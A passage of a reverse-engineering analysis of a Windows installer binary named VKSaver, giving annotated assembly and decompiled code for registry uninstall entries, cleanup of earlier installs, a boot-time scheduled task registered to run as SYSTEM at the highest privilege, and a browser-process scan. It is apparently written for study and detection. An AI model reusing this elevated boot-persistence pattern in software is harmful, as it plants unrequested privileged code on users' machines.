int16_t iVar1;
code *pcVar2;
uint32_t uVar3;
code *pcVar4;
int32_t iVar5;
int16_t *piVar6;
undefined4 uStack_20c;
int16_t iStack_208;
undefined auStack_206 [510];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
/* 0x20006 = KEY_WRITE; the handle lands in uStack_20c */
iVar5 = (*advapi32.RegCreateKeyExW)(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver", 0, 0, 0, 0x20006, 0, &uStack_20c, 0);
pcVar2 = user32.wsprintfW;
if (iVar5 != 0) {
sub_406beb(); /* asm: return 0 */
return;
}
(*user32.wsprintfW)(&iStack_208, "VKSaver");
pcVar4 = advapi32.RegSetValueExW;
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2; /* cbData incl. terminator */
uVar3 = iVar5 * 2;
if (uVar3 < 0x200) {
*(auStack_206 + (uVar3 - 2)) = 0; /* NUL at wchar index cbData (bytes/chars mix-up in the original) */
iVar5 = (*advapi32.RegSetValueExW)(uStack_20c, "DisplayName", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
/* DisplayIcon = "\"<wide path at 0x4b1a10>\"" */
(*pcVar2)(&iStack_208, "\"%s\"", 0x4b1a10);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "DisplayIcon", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
/* UninstallString = "\"<path>\" -uninstall" */
(*pcVar2)(&iStack_208, "\"%s\" -uninstall", 0x4b1a10);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "UninstallString", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
/* Publisher: format string at 0x46afbc was not resolved by the decompiler */
(*pcVar2)(&iStack_208, 0x46afbc, 0x4b1a10);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "Publisher", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
/* DisplayVersion from the globals that sub_4064e0 fills from the
 * version resource: major, minor, packed date, build */
(*pcVar2)(&iStack_208, "%d.%d.%d.%d", [0x0x4b14fc], [0x0x4b1500], [0x0x4b1504], [0x0x4b1508]);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "DisplayVersion", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
(*advapi32.RegCloseKey)(uStack_20c);
sub_406beb(); /* asm: return 1 */
return;
}
}
}
}
}
/* some RegSetValueExW failed */
(*advapi32.RegCloseKey)(uStack_20c);
sub_406beb(); /* asm: return 0 */
return;
}
code_r0x00401508:
/* MSVC /GS range-check failure path; swi(3) is the int3 after it */
___report_rangecheckfailure();
pcVar2 = swi(3);
(*pcVar2)();
return;
}
0x4029B0 sub_4029b0 str 7 api 7 imm 10 Unknown
; sub_4029b0() — removes the traces of a previous installation.
; Called from sub_402ce0 when the byte flag at 0x4B14BA is set.
;   1. HKLM\...\CurrentVersion\Run (samDesired 2 = KEY_SET_VALUE):
;      delete the "VKSaverUpdater" value.
;   2. HKLM\SOFTWARE\VKSaver (samDesired 1 = KEY_QUERY_VALUE): if absent,
;      clear 0x4B14BA and return; else read "Install_Dir" (0x400-byte buffer).
;   3. sub_402820(ecx = HKLM, edx = key path) for both the Uninstall\VKSaver
;      and the SOFTWARE\VKSaver paths — presumably a key-deletion helper.
;   4. sub_4025e0(ecx = path, flag) for Install_Dir (flag 0) and for
;      <CommonPrograms>\VKSaver (flag 1) — presumably directory cleanup.
; The exact contracts of sub_402820 and sub_4025e0 are not visible here.
sub_4029b0() {
push ebp
mov ebp, esp
sub esp, 0xA20
; /GS stack cookie
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
; RegOpenKeyExW(HKLM, "SOFTWARE\\...\\Run", 0, 2 = KEY_SET_VALUE, &[ebp-0xA1C])
lea eax, [ebp-0xA1C]
push eax
push 0x02
push 0x00
push "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jnz .1
; RegDeleteValueW(hKey, "VKSaverUpdater"); RegCloseKey(hKey)
push "VKSaverUpdater"
push [ebp-0xA1C]
call [advapi32.RegDeleteValueW]
push [ebp-0xA1C]
call [advapi32.RegCloseKey]
.1:
; RegOpenKeyExW(HKLM, "SOFTWARE\\VKSaver", 0, 1 = KEY_QUERY_VALUE, &[ebp-0xA1C])
lea eax, [ebp-0xA1C]
push eax
push 0x01
push 0x00
push "SOFTWARE\\VKSaver"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jz .2
; no previous install recorded: clear the flag and return
mov byte ptr [0x4B14BA], 0x00
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.2:
; memset([ebp-0xA18], 0, 0x400); cbData = 0x400
push 0x400
lea eax, [ebp-0xA18]
push 0x00
push eax
mov dword ptr [ebp-0xA20], 0x400
call _memset()
add esp, 0x0C
; RegQueryValueExW(hKey, "Install_Dir", 0, 0, [ebp-0xA18], &[ebp-0xA20]); RegCloseKey
lea eax, [ebp-0xA20]
push eax
lea eax, [ebp-0xA18]
push eax
push 0x00
push 0x00
push "Install_Dir"
push [ebp-0xA1C]
call [advapi32.RegQueryValueExW]
push [ebp-0xA1C]
call [advapi32.RegCloseKey]
; inline wide-string copy of the Uninstall\VKSaver key path into [ebp-0x618]
xor ecx, ecx
jmp .3
.3:
movzx eax, word ptr [ecx+"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver"]
mov [ebp+ecx*1-0x618], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .3
; sub_402820(ecx = HKLM, edx = path) — fastcall
lea edx, [ebp-0x618]
mov ecx, 0x80000002
call sub_402820()
; same for "SOFTWARE\\VKSaver"
xor edx, edx
lea esp, [esp]
.4:
movzx eax, word ptr [edx+"SOFTWARE\\VKSaver"]
mov [ebp+edx*1-0x618], ax
lea edx, [edx+0x02]
test ax, ax
jnz .4
lea edx, [ebp-0x618]
mov ecx, 0x80000002
call sub_402820()
; Install_Dir non-empty -> sub_4025e0(ecx = Install_Dir, 0); else clear the flag
cmp word ptr [ebp-0xA18], 0x00
jz .5
push 0x00
lea ecx, [ebp-0xA18]
call sub_4025e0()
add esp, 0x04
jmp .6
.5:
mov byte ptr [0x4B14BA], 0x00
.6:
; SHGetSpecialFolderPathW(0, [ebp-0x208], 0x17 = CSIDL_COMMON_PROGRAMS, 0)
push 0x00
push 0x17
lea eax, [ebp-0x208]
push eax
push 0x00
call [shell32.SHGetSpecialFolderPathW]
; wcscat_s(buf, 0x100, "\\VKSaver"); sub_4025e0(ecx = buf, 1)
push "\\VKSaver"
lea eax, [ebp-0x208]
push 0x100
push eax
call _wcscat_s()
add esp, 0x0C
lea ecx, [ebp-0x208]
push 0x01
call sub_4025e0()
mov ecx, [ebp-0x04]
xor ecx, ebp
add esp, 0x04
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * sub_4029b0 — tears down a previous installation (invoked from sub_402ce0
 * when the byte flag at 0x4b14ba is set).
 *  - deletes the "VKSaverUpdater" value from HKLM\...\CurrentVersion\Run;
 *  - if HKLM\SOFTWARE\VKSaver is missing, clears the flag and returns;
 *  - otherwise reads Install_Dir, calls sub_402820 for the Uninstall\VKSaver
 *    and SOFTWARE\VKSaver key paths (asm passes ecx = HKLM, edx = path —
 *    presumably a key-deletion helper), then sub_4025e0 on Install_Dir
 *    (flag 0) and on <CommonPrograms>\VKSaver (flag 1) — presumably a
 *    directory cleanup; neither helper's body is visible here.
 * The decompiler dropped the fastcall arguments of the sub_402820/sub_4025e0
 * calls; see the asm listing above for them.
 */
void sub_4029b0(void)
{
int16_t iVar1;
int32_t iVar2;
undefined4 uStack_a24;
undefined4 uStack_a20;
int16_t aiStack_a1c [512];
int16_t aiStack_61c [520];
undefined auStack_20c [516];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
/* samDesired 2 = KEY_SET_VALUE */
iVar2 = (*advapi32.RegOpenKeyExW)(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2, &uStack_a20);
if (iVar2 == 0) {
(*advapi32.RegDeleteValueW)(uStack_a20, "VKSaverUpdater");
(*advapi32.RegCloseKey)(uStack_a20);
}
/* samDesired 1 = KEY_QUERY_VALUE */
iVar2 = (*advapi32.RegOpenKeyExW)(0x80000002, "SOFTWARE\\VKSaver", 0, 1, &uStack_a20);
if (iVar2 != 0) {
[0x0x4b14ba] = 0; /* nothing to clean: drop the flag */
sub_406beb();
return;
}
/* Install_Dir -> aiStack_a1c (0x400 bytes, zero-filled first); type unchecked */
uStack_a24 = 0x400;
_memset(aiStack_a1c, 0, 0x400);
(*advapi32.RegQueryValueExW)(uStack_a20, "Install_Dir", 0, 0, aiStack_a1c, &uStack_a24);
(*advapi32.RegCloseKey)(uStack_a20);
/* inline wide-string copy of the key path into aiStack_61c, then sub_402820(HKLM, path) */
iVar2 = 0;
do {
iVar1 = *(iVar2 + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver");
*(aiStack_61c + iVar2) = iVar1;
iVar2 = iVar2 + 2;
} while (iVar1 != 0);
sub_402820();
iVar2 = 0;
do {
iVar1 = *(iVar2 + "SOFTWARE\\VKSaver");
*(aiStack_61c + iVar2) = iVar1;
iVar2 = iVar2 + 2;
} while (iVar1 != 0);
sub_402820();
if (aiStack_a1c[0] == 0) {
[0x0x4b14ba] = 0; /* empty Install_Dir: drop the flag */
}
else {
sub_4025e0(0); /* asm: ecx = aiStack_a1c (Install_Dir) */
}
/* 0x17 = CSIDL_COMMON_PROGRAMS; then "<dir>\\VKSaver" -> sub_4025e0(ecx = path, 1) */
(*shell32.SHGetSpecialFolderPathW)(0, auStack_20c, 0x17, 0);
_wcscat_s(auStack_20c, 0x100, "\\VKSaver");
sub_4025e0(1);
sub_406beb();
return;
}
0x401BD0 sub_401bd0 str 7 api 5 imm 10 Unknown
; sub_401bd0(cl = flag) -> al
; Task Scheduler 2.0 persistence through COM. The method names below are
; derived from the vtable offsets against the taskschd.h interface layouts
; (and the ITaskService / IBootTrigger / IExecAction GUIDs present in the
; sample); treat them as a best-effort reading and confirm in a debugger.
; Sequence visible before the truncation:
;   CoInitializeEx(0, 2) / CoInitializeSecurity(.., 6, 3, ..)
;   CoCreateInstance(CLSID@0x46AD78, 0, 1, IID_ITaskService) -> [ebp-0x50]
;   ITaskService::Connect(4 empty VARIANTs), GetFolder(path@0x46B11C)
;   ITaskFolder::DeleteTask("VKSaver"), DeleteTask("VKSaverUpdate")
;   ITaskService::NewTask(0) -> ITaskDefinition at [ebp-0x48]
;   RegistrationInfo: put_Author("AudioVkontakte.ru"), put_Description(0x46B148)
;   Settings: put_StartWhenAvailable(TRUE)
;   Triggers.Create(8 = TASK_TRIGGER_BOOT) -> QueryInterface(IID_IBootTrigger), put_Id(0x46B18C)
;   Principal: put_RunLevel(1 = TASK_RUNLEVEL_HIGHEST)  <- elevated task
;   Actions.Create(0 = TASK_ACTION_EXEC) -> QueryInterface(IID_IExecAction) ...
; Every interface is Release()d (vtbl+0x08) after use. The cl flag is saved in
; bl but its use is past the truncation. Returns 0 (al) on CoCreateInstance or
; QueryInterface failure.
sub_401bd0() {
push ebp
mov ebp, esp
sub esp, 0xA4
; /GS stack cookie
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
; CLSID for CoCreateInstance assembled at [ebp-0x24] from 0x46AD78/0x46AD80
movq xmm0, qword ptr [0x46AD78]
push ebx
xor eax, eax
movq [ebp-0x24], xmm0
movq xmm0, qword ptr [0x46AD80]
; CoInitializeEx(NULL, 2 = COINIT_APARTMENTTHREADED)
push 0x02
push eax
mov bl, cl
; interface pointer slots zeroed: [ebp-0x50] service, [ebp-0x4C] folder,
; [ebp-0x5C], [ebp-0x54] exec action
mov dword ptr [ebp-0x50], 0x00
mov dword ptr [ebp-0x4C], 0x00
mov dword ptr [ebp-0x5C], 0x00
mov dword ptr [ebp-0x54], 0x00
mov [ebp-0xA0], ax
movq [ebp-0x1C], xmm0
call [ole32.CoInitializeEx]
; CoInitializeSecurity(0, -1, 0, 0, 6 = RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
;                      3 = RPC_C_IMP_LEVEL_IMPERSONATE, 0, 0, 0)
push 0x00
push 0x00
push 0x00
push 0x03
push 0x06
push 0x00
push 0x00
push 0xFFFFFFFF
push 0x00
call [ole32.CoInitializeSecurity]
; CoCreateInstance(&clsid, NULL, 1 = CLSCTX_INPROC_SERVER, &IID_ITaskService, &[ebp-0x50])
movq xmm0, qword ptr [ITaskService]
lea eax, [ebp-0x50]
push eax
lea eax, [ebp-0x44]
push eax
push 0x01
movq [ebp-0x44], xmm0
movq xmm0, qword ptr [0x46AD90]
push 0x00
lea eax, [ebp-0x24]
push eax
movq [ebp-0x3C], xmm0
call [ole32.CoCreateInstance]
mov edx, [ebp-0x50]
test edx, edx
jnz .2
.1:
; failure path -> return 0
xor al, al
pop ebx
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.2:
; ITaskService vtbl+0x28: Connect(VARIANT x4) — four 16-byte empty VARIANTs
; (copied from the zeroed [ebp-0xA0]) are materialised on the stack
movq xmm0, qword ptr [ebp-0xA0]
movq xmm1, qword ptr [ebp-0x98]
mov ecx, [edx]
sub esp, 0x10
mov eax, esp
sub esp, 0x10
movq [eax], xmm0
movq [eax+0x08], xmm1
mov eax, esp
sub esp, 0x10
movq [eax], xmm0
movq [eax+0x08], xmm1
mov eax, esp
sub esp, 0x10
movq [eax], xmm0
movq [eax+0x08], xmm1
mov eax, esp
push edx
movq [eax], xmm0
movq [eax+0x08], xmm1
call [ecx+0x28]
; ITaskService vtbl+0x1C: GetFolder(path@0x46B11C, &[ebp-0x4C])
mov eax, [ebp-0x50]
lea edx, [ebp-0x4C]
mov ecx, [eax]
push edx
push 0x46B11C
push eax
call [ecx+0x1C]
; ITaskFolder vtbl+0x3C: DeleteTask("VKSaver", 0) — replace any earlier task
mov eax, [ebp-0x4C]
push 0x00
mov ecx, [eax]
push "VKSaver"
push eax
call [ecx+0x3C]
; ITaskFolder vtbl+0x3C: DeleteTask("VKSaverUpdate", 0)
mov eax, [ebp-0x4C]
push 0x00
mov ecx, [eax]
push "VKSaverUpdate"
push eax
call [ecx+0x3C]
; ITaskService vtbl+0x24: NewTask(0, &[ebp-0x48]) -> ITaskDefinition
mov eax, [ebp-0x50]
lea edx, [ebp-0x48]
mov ecx, [eax]
push edx
push 0x00
push eax
call [ecx+0x24]
; service->Release()
mov eax, [ebp-0x50]
push eax
mov ecx, [eax]
call [ecx+0x08]
; ITaskDefinition vtbl+0x1C: get_RegistrationInfo(&[ebp-0x58])
mov eax, [ebp-0x48]
lea edx, [ebp-0x58]
mov ecx, [eax]
push edx
push eax
call [ecx+0x1C]
; IRegistrationInfo vtbl+0x28: put_Author("AudioVkontakte.ru")
mov eax, [ebp-0x58]
push "AudioVkontakte.ru"
mov ecx, [eax]
push eax
call [ecx+0x28]
; IRegistrationInfo vtbl+0x20: put_Description(string@0x46B148)
mov eax, [ebp-0x58]
push 0x46B148
mov ecx, [eax]
push eax
call [ecx+0x20]
; regInfo->Release()
mov eax, [ebp-0x58]
push eax
mov ecx, [eax]
call [ecx+0x08]
; ITaskDefinition vtbl+0x2C: get_Settings(&[ebp-0x74])
mov eax, [ebp-0x48]
lea edx, [ebp-0x74]
mov ecx, [eax]
push edx
push eax
call [ecx+0x2C]
; ITaskSettings vtbl+0x58: put_StartWhenAvailable(TRUE)
mov eax, [ebp-0x74]
push 0x01
mov ecx, [eax]
push eax
call [ecx+0x58]
; settings->Release()
mov eax, [ebp-0x74]
push eax
mov ecx, [eax]
call [ecx+0x08]
; ITaskDefinition vtbl+0x24: get_Triggers(&[ebp-0x6C])
mov eax, [ebp-0x48]
lea edx, [ebp-0x6C]
mov ecx, [eax]
push edx
push eax
call [ecx+0x24]
; ITriggerCollection vtbl+0x28: Create(8 = TASK_TRIGGER_BOOT, &[ebp-0x78])
mov eax, [ebp-0x6C]
lea edx, [ebp-0x78]
push edx
mov dword ptr [ebp-0x60], 0x00
mov ecx, [eax]
push 0x08
push eax
call [ecx+0x28]
; triggers->Release()
mov eax, [ebp-0x6C]
push eax
mov ecx, [eax]
call [ecx+0x08]
; trigger->QueryInterface(&IID_IBootTrigger at [ebp-0x14], &[ebp-0x60])
movq xmm0, qword ptr [IBootTrigger]
mov eax, [ebp-0x78]
lea edx, [ebp-0x60]
push edx
movq [ebp-0x14], xmm0
movq xmm0, qword ptr [0x46ADA0]
lea edx, [ebp-0x14]
movq [ebp-0x0C], xmm0
mov ecx, [eax]
push edx
push eax
call [ecx]
; trigger->Release(); bail out (return 0) if the IBootTrigger QI produced NULL
mov eax, [ebp-0x78]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov ecx, [ebp-0x60]
test ecx, ecx
jz .1
; IBootTrigger vtbl+0x24: put_Id(string@0x46B18C)
mov eax, [ecx]
push 0x46B18C
push ecx
call [eax+0x24]
; ITaskDefinition vtbl+0x3C: get_Principal(&[ebp-0x7C])
mov eax, [ebp-0x48]
lea edx, [ebp-0x7C]
mov ecx, [eax]
push edx
push eax
call [ecx+0x3C]
; IPrincipal vtbl+0x48: put_RunLevel(1 = TASK_RUNLEVEL_HIGHEST) — task runs elevated
mov eax, [ebp-0x7C]
push 0x01
mov ecx, [eax]
push eax
call [ecx+0x48]
; ITaskDefinition vtbl+0x44: get_Actions(&[ebp-0x68])
mov eax, [ebp-0x48]
lea edx, [ebp-0x68]
mov ecx, [eax]
push edx
push eax
call [ecx+0x44]
; IActionCollection vtbl+0x30: Create(0 = TASK_ACTION_EXEC, &[ebp-0x64])
mov eax, [ebp-0x68]
lea edx, [ebp-0x64]
mov ecx, [eax]
push edx
push 0x00
push eax
call [ecx+0x30]
; actions->Release()
mov eax, [ebp-0x68]
push eax
mov ecx, [eax]
call [ecx+0x08]
; action->QueryInterface(&IID_IExecAction at [ebp-0x34], &[ebp-0x54]) — call is past the truncation
movq xmm0, qword ptr [IExecAction]
mov eax, [ebp-0x64]
lea edx, [ebp-0x54]
push edx
movq [ebp-0x34], xmm0
movq xmm0, qword ptr [0x46AD20]
lea edx, [ebp-0x34]
; listing truncated
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
/* DISPLAY WARNING: Type casts are NOT being printed */
/* sub_401bd0 -- persistence through the Task Scheduler 2.0 COM API.
 * Deletes any existing "VKSaver" / "VKSaverUpdate" tasks in the task folder at
 * 0x46b11c, then registers a new "VKSaverUpdate" task with a trigger of type 8
 * (TASK_TRIGGER_BOOT), an exec action whose path is the string at 0x4b1a10 and
 * whose arguments are "-autoupdate", registered for "NT AUTHORITY\SYSTEM"
 * (logon type 5 = TASK_LOGON_SERVICE_ACCOUNT) with run level 1.
 * param_1: nonzero -> the task is additionally started right after registration.
 * No return value. HRESULTs are never examined; only the output interface
 * pointers are NULL-tested, so failures short-circuit silently.
 * Every call below is an indirect vtable call. The slot offsets are consistent
 * with the taskschd.h interfaces named in the comments, but the decompiler has
 * no type information, so those method names are inferred from the slots.
 * The surplus arguments attached to several calls (uVar*/iVar* locals derived
 * from Stack_a2 / uStack_9c, which are never written) are decompiler
 * stack-analysis artifacts, not real parameters.
 * Detection angle: task-registration events for "VKSaverUpdate" and the
 * registration author string "AudioVkontakte.ru". */
void __fastcall sub_401bd0(char param_1)
{
undefined4 uVar1;
undefined4 uVar2;
int32_t *piVar3;
int64_t iVar4;
undefined8 uVar5;
undefined4 uVar6;
undefined4 uVar7;
undefined4 uVar8;
undefined4 uVar9;
undefined4 uVar10;
undefined4 uVar11;
undefined8 uVar12;
int64_t iVar13;
undefined8 uVar14;
unkuint6 Stack_a2;
undefined8 uStack_9c;
unkbyte6 Stack_92;
undefined4 uStack_88;
int32_t *piStack_80;
int32_t *piStack_7c;
int32_t *piStack_78;
int32_t *piStack_74;
int32_t *piStack_70;
int32_t *piStack_6c;
int32_t *piStack_68;
int32_t *piStack_64;
int32_t *piStack_60;
int32_t *piStack_5c;
int32_t *piStack_58;
int32_t *piStack_54;
int32_t *piStack_50;
int32_t *piStack_4c;
undefined8 uStack_48;
undefined8 uStack_40;
undefined8 uStack_38;
undefined8 uStack_30;
undefined8 uStack_28;
undefined8 uStack_20;
undefined8 uStack_18;
undefined8 uStack_10;
uint32_t uStack_8;
/* MSVC /GS stack cookie; sub_406beb at each exit looks like __security_check_cookie. */
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
/* CLSID (0x46ad78/0x46ad80) and IID (ITaskService + 0x46ad90) copied to the stack for CoCreateInstance. */
uStack_28 = [0x0x46ad78];
piStack_54 = 0x0;
piStack_50 = 0x0;
piStack_60 = 0x0;
piStack_58 = 0x0;
uStack_20 = [0x0x46ad80];
/* 2 = COINIT_APARTMENTTHREADED; security: authn level 6 (PKT_PRIVACY), impersonation level 3 (IMPERSONATE). */
(*ole32.CoInitializeEx)(0, 2);
(*ole32.CoInitializeSecurity)(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
uStack_48 = ITaskService;
uStack_40 = [0x0x46ad90];
/* 1 = CLSCTX_INPROC_SERVER; piStack_54 receives the ITaskService pointer. */
(*ole32.CoCreateInstance)(&uStack_28, 0, 1, &uStack_48, &piStack_54);
if (piStack_54 != 0x0) {
/* These locals are built from stack slots that are never assigned; they only
 * feed the spurious extra call arguments mentioned in the header. */
iVar4 = Stack_a2 << 0x10;
uVar8 = iVar4;
uVar10 = Stack_a2 >> 0x10;
uVar6 = uStack_9c >> 0x20;
uVar5 = uStack_9c;
uVar1 = uVar10;
uVar2 = uStack_9c;
uVar7 = uVar6;
uVar9 = uVar8;
uVar11 = uVar10;
uVar12 = uStack_9c;
iVar13 = iVar4;
uVar14 = uStack_9c;
piVar3 = piStack_54;
/* slot 0x28: ITaskService::Connect (arguments not recovered -> local machine, current user). */
(**(*piStack_54 + 0x28))();
/* slot 0x1c: ITaskService::GetFolder(path string at 0x46b11c) -> piStack_50 (ITaskFolder). */
(**(*piStack_54 + 0x1c))
(piStack_54, 0x46b11c, &piStack_50, piVar3, iVar4, uVar5, uVar8, uVar1, uVar2, uVar7, uVar9, uVar11,
uVar12, iVar13, uVar14);
/* slot 0x3c: ITaskFolder::DeleteTask for "VKSaver", then for "VKSaverUpdate"
 * (the second call's arguments were hoisted into uVar1/uVar2/piVar3). */
(**(*piStack_50 + 0x3c))(piStack_50, "VKSaver", 0);
uVar2 = 0;
uVar1 = "VKSaverUpdate";
piVar3 = piStack_50;
(**(*piStack_50 + 0x3c))();
/* slot 0x24: ITaskService::NewTask(0) -> piStack_4c (ITaskDefinition); the service is released right after. */
(**(*piStack_54 + 0x24))(piStack_54, 0, &piStack_4c, piVar3, uVar1, uVar2);
(**(*piStack_54 + 8))(piStack_54);
/* slot 0x1c: get_RegistrationInfo; slot 0x28 put_Author("AudioVkontakte.ru"),
 * slot 0x20 put_Description(string at 0x46b148), then Release. */
(**(*piStack_4c + 0x1c))(piStack_4c, &piStack_5c);
(**(*piStack_5c + 0x28))(piStack_5c, "AudioVkontakte.ru");
(**(*piStack_5c + 0x20))(piStack_5c, 0x46b148);
(**(*piStack_5c + 8))(piStack_5c);
/* slot 0x2c: get_Settings; slot 0x58 on ITaskSettings is consistent with put_StartWhenAvailable(TRUE). */
(**(*piStack_4c + 0x2c))(piStack_4c, &piStack_78);
(**(*piStack_78 + 0x58))(piStack_78, 1);
(**(*piStack_78 + 8))(piStack_78);
/* slot 0x24: get_Triggers; ITriggerCollection::Create(8) -- 8 = TASK_TRIGGER_BOOT -> piStack_7c. */
(**(*piStack_4c + 0x24))(piStack_4c, &piStack_70);
piStack_64 = 0x0;
(**(*piStack_70 + 0x28))(piStack_70, 8, &piStack_7c);
(**(*piStack_70 + 8))(piStack_70);
/* slot 0: QueryInterface(IID_IBootTrigger) on the new trigger -> piStack_64. */
uStack_18 = IBootTrigger;
uStack_10 = [0x0x46ada0];
(***piStack_7c)(piStack_7c, &uStack_18, &piStack_64);
(**(*piStack_7c + 8))(piStack_7c);
if (piStack_64 != 0x0) {
/* slot 0x24 on ITrigger: put_Id(string at 0x46b18c). The IBootTrigger pointer is never released. */
(**(*piStack_64 + 0x24))(piStack_64, 0x46b18c);
/* slot 0x3c: get_Principal; slot 0x48 on IPrincipal is consistent with put_RunLevel(1) = TASK_RUNLEVEL_HIGHEST. */
(**(*piStack_4c + 0x3c))(piStack_4c, &piStack_80);
(**(*piStack_80 + 0x48))(piStack_80, 1);
/* slot 0x44: get_Actions; IActionCollection::Create(0) -- 0 = TASK_ACTION_EXEC -> piStack_68. */
(**(*piStack_4c + 0x44))(piStack_4c, &piStack_6c);
(**(*piStack_6c + 0x30))(piStack_6c, 0, &piStack_68);
(**(*piStack_6c + 8))(piStack_6c);
/* QueryInterface(IID_IExecAction) -> piStack_58; the decompiler split the call into a
 * bare slot-0 invocation followed by the slot-8 Release carrying the packed arguments. */
uStack_38 = IExecAction;
uStack_30 = [0x0x46ad20];
uVar5 = CONCAT44(&piStack_58, &uStack_38);
piVar3 = piStack_68;
(***piStack_68)();
(**(*piStack_68 + 8))(piStack_68, piVar3, uVar5);
if (piStack_58 != 0x0) {
/* IExecAction slot 0x2c put_Path(string at 0x4b1a10), slot 0x34 put_Arguments("-autoupdate"). */
(**(*piStack_58 + 0x2c))(piStack_58, 0x4b1a10);
(**(*piStack_58 + 0x34))(piStack_58, "-autoupdate");
(**(*piStack_58 + 8))();
/* slot 0x44: ITaskFolder::RegisterTaskDefinition("VKSaverUpdate", definition,
 * flags 6 = TASK_CREATE_OR_UPDATE, user = BSTR "NT AUTHORITY\SYSTEM", password
 * VARIANT, logon type 5 = TASK_LOGON_SERVICE_ACCOUNT, sddl VARIANT) -> piStack_60.
 * The CONCAT62/CONCAT44/Stack_* operands are the decompiler's rendering of the
 * VARIANT arguments passed by value. The BSTR is never freed. */
uVar1 = (*oleaut32.SysAllocString)("NT AUTHORITY\\SYSTEM");
(**(*piStack_50 + 0x44))
(piStack_50, "VKSaverUpdate", piStack_4c, 6, CONCAT62(Stack_92, 8), CONCAT44(uStack_88, uVar1),
Stack_a2 << 0x10, uStack_9c, 5, Stack_a2 << 0x10, uVar10, uStack_9c, uVar6, &piStack_60);
/* Optional immediate launch: slot 0x30 on IRegisteredTask is consistent with Run(params) -> IRunningTask. */
if ((param_1 != '\0') && (piStack_60 != 0x0)) {
piStack_74 = 0x0;
(**(*piStack_60 + 0x30))(piStack_60, CONCAT62(Stack_92, 1), CONCAT44(uStack_88, uVar1), &piStack_74)
;
if (piStack_74 != 0x0) {
(**(*piStack_74 + 8))(piStack_74);
}
}
/* Release folder, definition and registered task; the IExecAction/IPrincipal pointers are not released. */
(**(*piStack_50 + 8))(piStack_50);
(**(*piStack_4c + 8))();
if (piStack_60 != 0x0) {
(**(*piStack_60 + 8))(piStack_60);
}
(*ole32.CoUninitialize)();
sub_406beb();
return;
}
}
}
/* Early-exit path for any NULL interface pointer: COM stays initialised (no
 * CoUninitialize) and the interfaces obtained so far are not released. */
sub_406beb();
return;
}
0x401740 sub_401740 str 7 api 4 imm 12 Unknown
; sub_401740 -- scans the process list for known browsers.
; Walks a Toolhelp snapshot (flags 2 = TH32CS_SNAPPROCESS) and compares each
; PROCESSENTRY32W.szExeFile against a fixed list, assigning one bit per browser:
;   iexplore.exe 0x01, firefox.exe 0x02, opera.exe 0x04, chrome.exe 0x08,
;   safari.exe 0x10, browser.exe 0x20, maxthon.exe 0x40.
; Custom calling convention (the decompiled view below shows it as __fastcall):
;   ecx        = optional DWORD array receiving the PID of each match (edi)
;   edx        = optional BYTE array receiving the browser bit of each match (esi)
;   [ebp+0x08] = optional DWORD accumulating the OR of all bits seen (ebx)
; Returns eax = number of matching processes, kept in [ebp-0x234]; the
; decompiled version drops this return value.
; Stack layout: [ebp-0x230] is the PROCESSENTRY32W (dwSize = 0x22C set below),
; so [ebp-0x228] is th32ProcessID and [ebp-0x20C] is szExeFile.
; Review notes: the snapshot handle is used without an INVALID_HANDLE_VALUE
; check; both output arrays are written once per match with no bound, so the
; caller has to size them for the worst case. sub_406ed0 returns 0 on a name
